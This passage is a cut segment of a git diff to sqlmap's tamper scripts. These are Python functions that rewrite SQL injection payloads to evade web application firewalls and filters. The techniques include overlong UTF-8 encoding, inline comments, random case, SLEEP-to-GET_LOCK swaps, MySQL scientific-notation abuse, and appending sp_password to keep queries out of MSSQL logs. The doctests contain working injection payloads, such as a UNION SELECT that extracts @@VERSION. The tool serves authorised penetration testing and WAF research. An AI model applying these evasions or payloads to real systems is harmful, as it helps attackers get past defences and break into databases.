"%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) + retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index c5b4a891862..00000000000 --- a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters - - Example: - * Input: 1 UNION SELECT 2-- - * Output: 1 UNUNIONION SELSELECTECT 2-- - - Notes: - * Useful to bypass very weak custom filters - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. 
" % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/tamper/ord2ascii.py b/tamper/ord2ascii.py new file mode 100644 index 00000000000..7e59ecb2ae6 --- /dev/null +++ b/tamper/ord2ascii.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces ORD() occurences with equivalent ASCII() calls + Requirement: + * MySQL + >>> tamper("ORD('42')") + "ASCII('42')" + """ + + retVal = payload + + if payload: + retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload) + + return retVal diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py new file mode 100644 index 00000000000..75bd678e775 --- /dev/null +++ b/tamper/overlongutf8.py @@ -0,0 +1,46 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7) + + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + 'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + if payload[i] not in (string.ascii_letters + string.digits): + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + else: + retVal += payload[i] + i += 1 + + return retVal diff --git a/tamper/overlongutf8more.py b/tamper/overlongutf8more.py new file mode 100644 index 00000000000..391464f6ef7 --- /dev/null +++ b/tamper/overlongutf8more.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOWEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. 
SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) + + Reference: + * https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ + * https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/ + + >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') + '%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += payload[i:i + 3] + i += 3 + else: + retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) + i += 1 + + return retVal diff --git a/tamper/percentage.py b/tamper/percentage.py index 71bb40bc96c..4f4da1f6186 100644 --- a/tamper/percentage.py +++ b/tamper/percentage.py @@ -1,15 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import string -from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -18,11 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds a percentage sign ('%') infront of each character - - Example: - * Input: SELECT FIELD FROM TABLE - * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E + Adds a percentage sign ('%') infront of each character (e.g. 
SELECT -> %S%E%L%E%C%T) Requirement: * ASP @@ -34,6 +30,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT FIELD FROM TABLE') + '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' """ if payload: diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py new file mode 100644 index 00000000000..a1738a11079 --- /dev/null +++ b/tamper/plus2concat.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.common import zeroDepthSearch +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) + +def tamper(payload, **kwargs): + """ + Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart + + Tested against: + * Microsoft SQL Server 2012 + + Requirements: + * Microsoft SQL Server 2012+ + + Notes: + * Useful in case ('+') character is filtered + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL' + + >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe') + '1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe' + """ + + retVal = payload + + if payload: + match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) + if match: + part = match.group(0) + + chars = [char for char in part] + for index in zeroDepthSearch(part, '+'): + chars[index] = ',' + + replacement = "CONCAT(%s)" % "".join(chars) + retVal = retVal.replace(part, replacement) + + return retVal diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py new file mode 100644 index 00000000000..0706275e904 --- /dev/null +++ b/tamper/plus2fnconcat.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.common import zeroDepthSearch +from lib.core.compat import xrange +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) + +def tamper(payload, **kwargs): + """ + Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart + + Tested against: + * Microsoft SQL Server 2008 + + Requirements: + * Microsoft SQL Server 2008+ + + Notes: + * Useful in case ('+') character is filtered + * https://msdn.microsoft.com/en-us/library/bb630290.aspx + + >>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL') + 'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL' + + >>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS 
NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe') + '1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe' + """ + + retVal = payload + + if payload: + match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) + if match: + old = match.group(0) + parts = [] + last = 0 + + for index in zeroDepthSearch(old, '+'): + parts.append(old[last:index].strip('+')) + last = index + + parts.append(old[last:].strip('+')) + replacement = parts[0] + + for i in xrange(1, len(parts)): + replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i]) + + retVal = retVal.replace(old, replacement) + + return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py index b8da136a5bb..24cf7876ff7 100644 --- a/tamper/randomcase.py +++ b/tamper/randomcase.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import randomRange +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import PRIORITY @@ -18,35 +19,47 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each keyword character with random case value - - Example: - * Input: INSERT - * Output: InsERt + Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 + * SQLite 3 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) 
databases + + >>> import random + >>> random.seed(0) + >>> tamper('INSERT') + 'InSeRt' + >>> tamper('f()') + 'f()' + >>> tamper('function()') + 'FuNcTiOn()' + >>> tamper('SELECT id FROM `user`') + 'SeLeCt id FrOm `user`' """ retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): + for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal): word = match.group() - if word.upper() in kb.keywords: - _ = str() + if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload: + while True: + _ = "" + + for i in xrange(len(word)): + _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - for i in xrange(len(word)): - _ += word[i].upper() if randomRange(0, 1) else word[i].lower() + if len(_) > 1 and _ not in (_.lower(), _.upper()): + break retVal = retVal.replace(word, _) diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py index a81f63f56a1..a4a185f79ad 100644 --- a/tamper/randomcomments.py +++ b/tamper/randomcomments.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from lib.core.common import randomRange +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import PRIORITY @@ -15,14 +16,18 @@ def tamper(payload, **kwargs): """ - Add random comments to SQL keywords - Example: 'INSERT' becomes 'IN/**/S/**/ERT' + Inserts random inline comments within SQL keywords (e.g. SELECT -> S/**/E/**/LECT) + + >>> import random + >>> random.seed(0) + >>> tamper('INSERT') + 'I/**/NS/**/ERT' """ retVal = payload if payload: - for match in re.finditer(r"[A-Za-z_]+", payload): + for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if len(word) < 2: @@ -35,6 +40,11 @@ def tamper(payload, **kwargs): _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) _ += word[-1] + + if "/**/" not in _: + index = randomRange(1, len(word) - 1) + _ = word[:index] + "/**/" + word[index:] + retVal = retVal.replace(word, _) return retVal diff --git a/tamper/schemasplit.py b/tamper/schemasplit.py new file mode 100644 index 00000000000..07a4b2a7bbe --- /dev/null +++ b/tamper/schemasplit.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 
'testdb 9.e.users') + + Requirement: + * MySQL + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('SELECT id FROM testdb.users') + 'SELECT id FROM testdb 9.e.users' + """ + + return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload diff --git a/tamper/scientific.py b/tamper/scientific.py new file mode 100644 index 00000000000..a9dc194dccf --- /dev/null +++ b/tamper/scientific.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Abuses MySQL scientific notation + + Requirement: + * MySQL + + Notes: + * Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/ + + >>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1') + '1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1' + """ + + if payload: + payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload) + payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure + + return payload diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 9b9a8e8f18f..00000000000 --- a/tamper/securesphere.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string - - Example: - * Input: AND 1=1 - * Output: AND 1=1 and '0having'='0having' - - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/sleep2getlock.py b/tamper/sleep2getlock.py new file mode 100644 index 00000000000..cf2797936a3 --- /dev/null +++ b/tamper/sleep2getlock.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import kb +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces instances like 'SLEEP(5)' with (e.g.) 
"GET_LOCK('ETgP',5)" + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the SLEEP() and BENCHMARK() functions + + * Reference: https://zhuanlan.zhihu.com/p/35245598 + + >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName + True + """ + + if payload: + payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName) + + return payload diff --git a/tamper/sp_password.py b/tamper/sp_password.py index af7934abaf9..4efcc1c98e8 100644 --- a/tamper/sp_password.py +++ b/tamper/sp_password.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -11,11 +11,7 @@ def tamper(payload, **kwargs): """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs - - Example: - * Input: 1 AND 9227=9227-- - * Output: 1 AND 9227=9227--sp_password + Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs Requirement: * MSSQL @@ -23,6 +19,9 @@ def tamper(payload, **kwargs): Notes: * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure * Reference: http://websec.ca/kb/sql_injection + + >>> tamper('1 AND 9227=9227-- ') + '1 AND 9227=9227-- sp_password' """ retVal = "" diff --git a/tamper/space2comment.py b/tamper/space2comment.py index 89022472d58..818e118526e 100644 --- a/tamper/space2comment.py +++ b/tamper/space2comment.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW @@ -16,10 +17,6 @@ def tamper(payload, **kwargs): """ Replaces space character (' ') with comments '/**/' - Example: - * Input: SELECT id FROM users - * Output: SELECT/**/id/**/FROM/**/users - Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 @@ -28,6 +25,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**/id/**/FROM/**/users' """ retVal = payload diff --git a/tamper/space2dash.py b/tamper/space2dash.py index 2362fdee00a..b865e60fcf3 100644 --- a/tamper/space2dash.py +++ b/tamper/space2dash.py @@ -1,36 +1,34 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import random import string +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def tamper(payload, **kwargs): """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227 + Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') Requirement: * MSSQL * SQLite - Tested against: - Notes: * Useful to bypass 
several web application firewalls * Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/ + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227' """ retVal = "" @@ -38,7 +36,7 @@ def tamper(payload, **kwargs): if payload: for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "--%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2hash.py b/tamper/space2hash.py index e0271850604..4a8d6916dc2 100644 --- a/tamper/space2hash.py +++ b/tamper/space2hash.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -10,6 +10,7 @@ import string from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -20,12 +21,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL @@ -37,6 +33,10 @@ def tamper(payload, **kwargs): * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227' """ retVal = "" @@ -44,7 +44,7 @@ def tamper(payload, **kwargs): if payload: for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2morecomment.py b/tamper/space2morecomment.py new file mode 100644 index 00000000000..df823e70660 --- /dev/null +++ b/tamper/space2morecomment.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.compat import xrange +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances of space character (' ') with comments '/**_**/' + + Tested against: + * MySQL 5.0 and 5.5 + + Notes: + * Useful to bypass weak and bespoke web application firewalls + + >>> tamper('SELECT id FROM users') + 'SELECT/**_**/id/**_**/FROM/**_**/users' + """ + + retVal = payload + + if payload: + retVal = "" + quote, doublequote, firstspace = False, False, False + + for i in xrange(len(payload)): + if not firstspace: + if payload[i].isspace(): + firstspace = 
True + retVal += "/**_**/" + continue + + elif payload[i] == '\'': + quote = not quote + + elif payload[i] == '"': + doublequote = not doublequote + + elif payload[i] == " " and not doublequote and not quote: + retVal += "/**_**/" + continue + + retVal += payload[i] + + return retVal diff --git a/tamper/space2morehash.py b/tamper/space2morehash.py index 6d759b9e828..d6365f9b77f 100644 --- a/tamper/space2morehash.py +++ b/tamper/space2morehash.py @@ -1,16 +1,17 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os -import re import random +import re import string from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import kb from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -23,12 +24,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 + Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') Requirement: * MySQL >= 5.1.13 @@ -40,11 +36,15 @@ def tamper(payload, **kwargs): * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + + >>> random.seed(0) + >>> tamper('1 AND 9227=9227') + '1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227' """ def process(match): word = match.group('word') - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) @@ -54,11 +54,11 @@ def process(match): retVal = "" if payload: - payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) + payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", process, payload) for i in xrange(len(payload)): if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for _ in xrange(random.randint(6, 12))) + randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py index 22f7f390664..0413f447413 100644 --- a/tamper/space2mssqlblank.py +++ b/tamper/space2mssqlblank.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import random from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -19,12 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces 
space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT%08id%02FROM%0Fusers + Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters Requirement: * Microsoft SQL Server @@ -35,6 +31,10 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> random.seed(0) + >>> tamper('SELECT id FROM users') + 'SELECT%0Did%0DFROM%04users' """ # ASCII table: diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py index d72d8f07cdc..49ac43a0a51 100644 --- a/tamper/space2mssqlhash.py +++ b/tamper/space2mssqlhash.py @@ -1,22 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.compat import xrange from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def tamper(payload, **kwargs): """ - Replaces space character (' ') with a pound character ('#') followed by - a new line ('\n') - - Example: - * Input: 1 AND 9227=9227 - * Output: 1%23%0A9227=9227 + Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') Requirement: * MSSQL @@ -24,6 +20,9 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass several web application firewalls + + >>> tamper('1 AND 9227=9227') + '1%23%0AAND%23%0A9227=9227' """ retVal = "" diff --git a/tamper/space2mysqlblank.py b/tamper/space2mysqlblank.py index 0eb3924ac96..a0891989ca6 100644 --- a/tamper/space2mysqlblank.py +++ b/tamper/space2mysqlblank.py @@ -1,14 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import random from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.enums import DBMS from lib.core.enums import PRIORITY @@ -19,12 +20,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character (' ') with a random blank character from a - valid set of alternate characters - - Example: - * Input: SELECT id FROM users - * Output: SELECT%0Bid%0BFROM%A0users + Replaces (MySQL) instances of space character (' ') with a random blank character from 